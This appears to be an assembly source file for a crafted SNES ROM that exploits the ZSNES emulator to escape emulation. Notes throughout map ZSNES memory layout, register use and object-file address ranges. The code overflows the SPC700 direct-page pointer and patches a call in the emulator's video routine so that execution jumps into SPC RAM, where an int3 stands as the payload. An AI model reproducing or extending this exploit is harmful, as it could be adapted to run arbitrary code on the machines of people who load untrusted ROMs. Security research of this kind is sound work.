;rm Z2.sfc; asar Z2.asm
;switch to windows

;method:
;- overflow TRB to SPC DP pointer, reduce DP from 007122A4 to ???
;- through STA dp, write a 'jmp SPCRAM' to some random unused part of 0043xxxx
;- screw up 0043EE80 so it jumps to this code

;access:
;0070344C = DSPRAM plus DP=100
;00403400-0040354B - full
;00403400-0041354B - TRB only
;00503400-0050354B - full
;00503400-0051354B - TRB only
;00603400-0060354B - full
;00603400-0061354B - TRB only

;hackable:
;55  - video/m716text.obj - video/m716text.asm - 00505AA0-0050A533
;40  - video/makev16b.obj - video/makev16b.asm - 0050A540-0050EA89
;41  - video/makev16t.obj - video/makev16t.asm - 0050EA90-0052335C
;56  - video/procvid.obj  - video/procvid.asm  - ??-00606FEE-006098C5
; some of those outputchar functions may be usable - in particular, the rom info one, we can hack them before the message dies.
;  those OutputGraphicString5x5 calls, maybe?
; or the print string function - I can hack it then print SPC STALL DETECTED, and win.
; method 3: take one of those je's and zero its operand.
; note to self:
;  copyvid  - 00609628
;  vidpaste - 006097C3
; zeroing 00607060+1 should work.
;57  - video/procvidc.obj - video/procvidc.c   - 006098D0-00609BF2
; unreliable
;96  - video/sw_draw.obj  - video/sw_draw.asm  - 00609C00-00609ED9
; unreliable

;procedure:
;- edit 'call saveselect ; 00607062 _ E8, FFFFFFC7':
; - turn the operand to 000FFFC7
; - this jumps to 00707029, SPCRAM+0x3CDD
;- edit 'jz .nosavesel ; 00607060 _ 75, 05'
; - turn operand to 00


;ZSNES register use while executing opcodes:
;eax - value to be written, scratch
;ebx - current opcode byte, scratch
;ecx - current address, scratch?
;edx.h - cycle counter?
;edx.l - something important; cpu flags?
; these four can be overwritten I think
;esi - next opcode to execute (pointer to ROM)
;edi - opcode dispatch table
;ebp - pointer to where the SPC is executing?
;esp - stack
; must be preserved

;the following registers are pushed during DMA handling:
; eax esi edi ecx edx
; ebx esp - also harmless to use, ebx is global scratch across zsnes and nobody ever violates esp
; however, ebp is danger
;register use during DMA handling:
; eax - free, initially 'snesmmap' or 'snesmap2'
; ebx - SCRATCH; set to garbage (ebx=0, bl=current bank) between each iteration
; ecx - UNSAFE; current 'snippet pc' (0x002160 and higher)
; edx - safe to use temporarily, but 4 is subtracted every fourth iteration, and if <= 4, the loop ends
; esi - free, initially random pointer
; edi - free, initially '.addrwrite' for the relevant PPU reg mode (two regs write twice, etc)
; ebp - UNSAFE; something SPC-related, must be preserved




org $008000
Reset:
XCE

REP #$10
PEA $2100
PLD
LDY #$BBAA
- CPY $40 : BNE -

LDY.w #SPCCodeStart
STY $42
LDY #$01CC
STY $40
TYA
- CMP $40 : BNE -

LDY.w #SPCDataEnd-SPCData
--
LDA SPCData,x
STA $41
TXA
STA $40
- CMP $40 : BNE -
INX
DEY
BNE --

LDY.w #SPCInit
STY $42
INX
STX $40

BRA $FE




;memtable.c  - 0070312C (used only during boot, harmless to scramble)
;SPCRAM      - 0070334C
;spcRamDP    - 00713378 (SPCRAM + 0x1002C)
;spcextraram - 0071338C (SPCRAM + 0x10040)
;
;opcjmptab   - ???????? (SPC700 opcode dispatch table)
;spcWptr     - ???????? (SPC700 $F0..$FF write dispatch table)
;spcRptr     - ????????

;I can clear any number of bits from one byte of 0070344C, then access 256 bytes at that pointer.
;I can also access 0x4C bytes backwards, by clearing that byte first.
;This means that I can access:
;0050344C - hq?x??.asm
;0060344C - video/newgfx2.asm
;and must force one of them to execute.




;Alternatively, I can access 0070_000-0070_4A3, for any _ <= 3.

;006E9600-006E961F - cpu/dspproc.asm SBHDMA and above
;006E9620-006E9A7F - cpu/dspproc.asm Gaussian:
;006E9A80-006EA27F - cpu/dspproc.asm CubicSpline:
;006EA280-006F228F - cpu/firtable.inc fir_lut:
;00700000 {
;007004A3 }
;00701000 {
;007014A3 }
;00702000 {
;006F2290-0070229F - cpu/firtable.inc fir_lut_co:
;00702316-0070239E - cpu/dspproc.asm NoiseSpeeds
;007022A0-007026DF - cpu/dspproc.asm
;007024A3 }

;00703000 {
;00702E44-0070312B - execute.asm, no pointers (00703000 is somewhere inside 'pressed')
;0070312C-0070334B - memtable.c, used only during boot
;0070334C-0071330C SPCRAM
;007034A3 }



;zsneswu.asm:
;
;dsp.asm     - 00427E00
;transdma    - 
;transdmappu - 
;updatetimer - 
;Op4E        - 004447A7
;
;
;.curbank    -  (dma.asm transdma)
;.curbank    -  (dma.asm transdmappu2cpu)
;memtable.c  - 0070312C (used only during boot, harmless to scramble)
;SPCRAM      - 0070334C
;spcRamDP    - 00713378 (SPCRAM + 0x1002C)
;spcextraram - 0071338C (SPCRAM + 0x10040)
;
;opcjmptab   -  (SPC700 opcode dispatch table)
;spcWptr     - 007785B8 (SPC700 $F0..$FF write dispatch table)
;spcRptr     - 007785F8




SPCData:
arch spc700
base $4443



SPCCodeStart:

db $CC ; int3


SPCInit:


mov $F1,#$00 ; otherwise writes to >= FFC0 (including 1002E) are sent only to wrong place
setp ; add 100 to tclr.w

;SPCRAM = 0070334C
;      src^dst
mov a,#$70^$60
tclr $0071337A-$0070344C,a ; spcRamDP @ 00713378: 0070344C -> 0060344C

;screw up routine video/procvid.asm copyvid.do16b
mov a,#$FF^$00
tclr $00609727+4-$0060344C,a ; call OutputGraphicString16b5x5 @ 00609727: call +FFFFE063 (0060778F) -> call +00FFE063 (0160778F)
mov a,#$FF^$0F
tclr $00609727+3-$0060344C,a ; call OutputGraphicString16b5x5 @ 00609727: call +00FFE063 (0160778F) -> call +000FE063 (0070778F)

bra $fe


;
;;spcRamDP = $FF2C..$FF2F = 0070344C
;;goal                    = 0060344C
;mov a,#$10
;tclr $FF2E,a
;
;mov a,#$CC
;mov $B5-$4C,a
;
;;mov a,#$FF
;;tclr $FF2E,a
;;
;;mov a,$00 ; use DP, segfault

;TODO: align to 4
;nop
;nop
;nop
StackStart:
;fillbyte 1/cos(StackStart%4)




base off
arch 65816
SPCDataEnd:

print "PC = ",pc


warnpc $0080C0
org    $0080C0
db "ZSNES SUCKS          ";name
db $20;lorom
db $00;no sram
db $05;1 bank
db $00;no sram
db $00;ntsc
db $00;licencee
db $00;version
dw $0000,$FFFF;checksum + complement
db $00,$00,$00,$00;unknown stuff
dw $5555,$5555,$FFFF;cop, brk, abort(?)
dw $5555,$FFFF,$5555;nmi, unused, irq
db $00,$00,$00,$00;unknown
dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
dw $FFFF,Reset,$FFFF;(emulation) nmi, reset, irq/brk

print "Bytes: ",bytes


;access:
;0070344C = DSPRAM plus DP=100
;00403400-0040354B - full
;00403400-0041354B - TRB only
;00503400-0050354B - full
;00503400-0051354B - TRB only
;00603400-0060354B - full
;00603400-0061354B - TRB only
;
;object files
;69  - cfg.obj            - cfg.psr            - 
;59  - endmem.obj         - endmem.asm         - none
;60  - init.obj           - init.asm           - 00409C10-0040B48F
;61  - initc.obj          - initc.c            - 
;71  - input.obj          - input.psr          - ??-00410FB0-00413DAD-??
;70  - md.obj             - md.psr             - 
;62  - patch.obj          - patch.c            - 
;64  - vcache.obj         - vcache.asm         - 
;65  - version.obj        - version.c          - 
;63  - ui.obj             - ui.c               - 
;68  - zloader.obj        - zloader.c          - 
;66  - zmovie.obj         - zmovie.c           - 
;72  - zpath.obj          - zpath.c            - 
;67  - zstate.obj         - zstate.c           - ??-00426A40-??
;74  - ztime.obj          - ztime.asm          - 00426F00-00426F86
;73  - ztimec.obj         - ztimec.c           - 00426F90-0042709E
;25  - cpu/dma.obj        - cpu/dma.asm        - 004270A0-00427DFF
;26  - cpu/dsp.obj        - cpu/dsp.asm        - 00427E00-0042D38E
;27  - cpu/dspproc.obj    - cpu/dspproc.asm    - 0042D390-00439C86
;28  - cpu/execute.obj    - cpu/execute.asm    - 00439C90-0043B7BA
;29  - cpu/executec.obj   - cpu/executec.c     - 0043B7C0-0043B7D3
;30  - cpu/irq.obj        - cpu/irq.asm        - 
;31  - cpu/memory.obj     - cpu/memory.asm     - 
;32  - cpu/memtable.obj   - cpu/memtable.c     - 
;33  - cpu/spc700.obj     - cpu/spc700.asm     - 0043EC00-00444C9B
;34  - cpu/stable.obj     - cpu/stable.asm     - 
;35  - cpu/table.obj      - cpu/table.asm      - 
;36  - cpu/tablec.obj     - cpu/tablec.asm     - 
;99  - video/2xsaiw.obj   - video/2xsaiw.asm   - 
;104 - video/copyvwin.obj - video/copyvwin.asm - 
;97  - video/hq2x16.obj   - video/hq2x16.asm   - 
;98  - video/hq2x32.obj   - video/hq2x32.asm   - 
;100 - video/hq3x16.obj   - video/hq3x16.asm   - 
;101 - video/hq3x32.obj   - video/hq3x32.asm   - 
;102 - video/hq4x16.obj   - video/hq4x16.asm   - 
;103 - video/hq4x32.obj   - video/hq4x32.asm   - 004E4870-00505A92
;55  - video/m716text.obj - video/m716text.asm - 00505AA0-0050A533
;40  - video/makev16b.obj - video/makev16b.asm - 0050A540-0050EA89
;41  - video/makev16t.obj - video/makev16t.asm - 0050EA90-0052335C
;42  - video/makevid.obj  - video/makevid.asm  - 
;48  - video/mode7.obj    - video/mode7.asm    - 
;43  - video/mode716.obj  - video/mode716.asm  - 
;44  - video/mode716b.obj - video/mode716b.asm - 
;45  - video/mode716d.obj - video/mode716d.asm - 
;46  - video/mode716e.obj - video/mode716e.asm - 
;47  - video/mode716t.obj - video/mode716t.asm - 
;49  - video/mode7ext.obj - video/mode7ext.asm - 
;50  - video/mv16tms.obj  - video/mv16tms.asm  - 
;51  - video/newg162.obj  - video/newg162.asm  - 
;54  - video/newgfx.obj   - video/newgfx.asm   - 005C77C0-005D66FE
;52  - video/newgfx16.obj - video/newgfx16.asm - 
;53  - video/newgfx2.obj  - video/newgfx2.asm  - ??-005F84E1-00605AC2
;58  - video/ntsc.obj     - video/ntsc.c       - 00605AD0-00606ED7-??
;56  - video/procvid.obj  - video/procvid.asm  - ??-00606FEE-006098C5
;57  - video/procvidc.obj - video/procvidc.c   - 006098D0-00609BF2
;96  - video/sw_draw.obj  - video/sw_draw.asm  - 00609C00-00609ED9
;22  - chips/7110proc.obj - chips/7110proc.asm - 00609EE0-0060B2A8
;14  - chips/c4emu.obj    - chips/c4emu.c      - 0060B2B0-0060BB70
;21  - chips/c4proc.obj   - chips/c4proc.asm   - 0060BB80-0060D67E
;1   - chips/dsp1emu.obj  - chips/dsp1emu.c    - 0060D680-0060F6E9
;9   - chips/dsp1proc.obj - chips/dsp1proc.asm - 0060F6F0-006104E3
;12  - chips/dsp2proc.obj - chips/dsp2proc.asm - 006104F0-00610A00
;18  - chips/dsp3emu.obj  - chips/dsp3emu.c    - 
;17  - chips/dsp3proc.obj - chips/dsp3proc.asm - 
;16  - chips/dsp4emu.obj  - chips/dsp4emu.c    - ??-00612DB0-0061351A-??
;15  - chips/dsp4proc.obj - chips/dsp4proc.asm - 
;6   - chips/fxtable.obj  - chips/fxtable.asm  - 
;2   - chips/fxemu2.obj   - chips/fxemu2.asm   - 00615460-??
;3   - chips/sfxproc.obj  - chips/sfxproc.asm  - 
;4   - chips/fxemu2b.obj  - chips/fxemu2b.asm  - 
;5   - chips/fxemu2c.obj  - chips/fxemu2c.asm  - 0061BAA0-??
;7   - chips/sa1proc.obj  - chips/sa1proc.asm  - 
;8   - chips/sa1regs.obj  - chips/sa1regs.asm  - 
;10  - chips/st10proc.obj - chips/st10proc.asm - 
;11  - chips/seta10.obj   - chips/seta10.c     - 
;13  - chips/sdd1emu.obj  - chips/sdd1emu.c    - 
;19  - chips/obc1emu.obj  - chips/obc1emu.c    - 
;20  - chips/obc1proc.obj - chips/obc1proc.asm - 
;23  - chips/st11proc.obj - chips/st11proc.asm - 
;24  - chips/seta11.obj   - chips/seta11.c     - 
;37  - gui/gui.obj        - gui/gui.asm        - 
;38  - gui/guifuncs.obj   - gui/guifuncs.c     - 
;39  - gui/menu.obj       - gui/menu.asm       - 0068E8B0-0068F454
;75  - zip/unzip.obj      - zip/unzip.c        - 
;76  - zip/zpng.obj       - zip/zpng.c         - 
;77  - effects/burn.obj   - effects/burn.c     - 
;78  - effects/water.obj  - effects/water.c    - 
;79  - effects/smoke.obj  - effects/smoke.c    - 
;80  - jma/7zlzma.obj     - jma/7zlzma.cpp     - 
;81  - jma/crc32.obj      - jma/crc32.cpp      - 
;82  - jma/iiostrm.obj    - jma/iiostrm.cpp    - 
;83  - jma/inbyte.obj     - jma/inbyte.cpp     - 
;84  - jma/jma.obj        - jma/jma.cpp        - 
;85  - jma/lzma.obj       - jma/lzma.cpp       - 
;86  - jma/lzmadec.obj    - jma/lzmadec.cpp    - 
;87  - jma/winout.obj     - jma/winout.cpp     - 
;88  - jma/zsnesjma.obj   - jma/zsnesjma.cpp   - 
;89  - win/zsnes.obj      - win/zsnes.rc       - 
;90  - win/winintrf.obj   - win/winintrf.asm   - 
;91  - win/winlink.obj    - win/winlink.cpp    - 
;92  - win/lib.obj        - win/lib.c          - 
;93  - win/safelib.obj    - win/safelib.c      - 
;94  - mmlib/mm.obj       - mmlib/mm.c         - 
;95  - mmlib/windows.obj  - mmlib/windows.c    - 
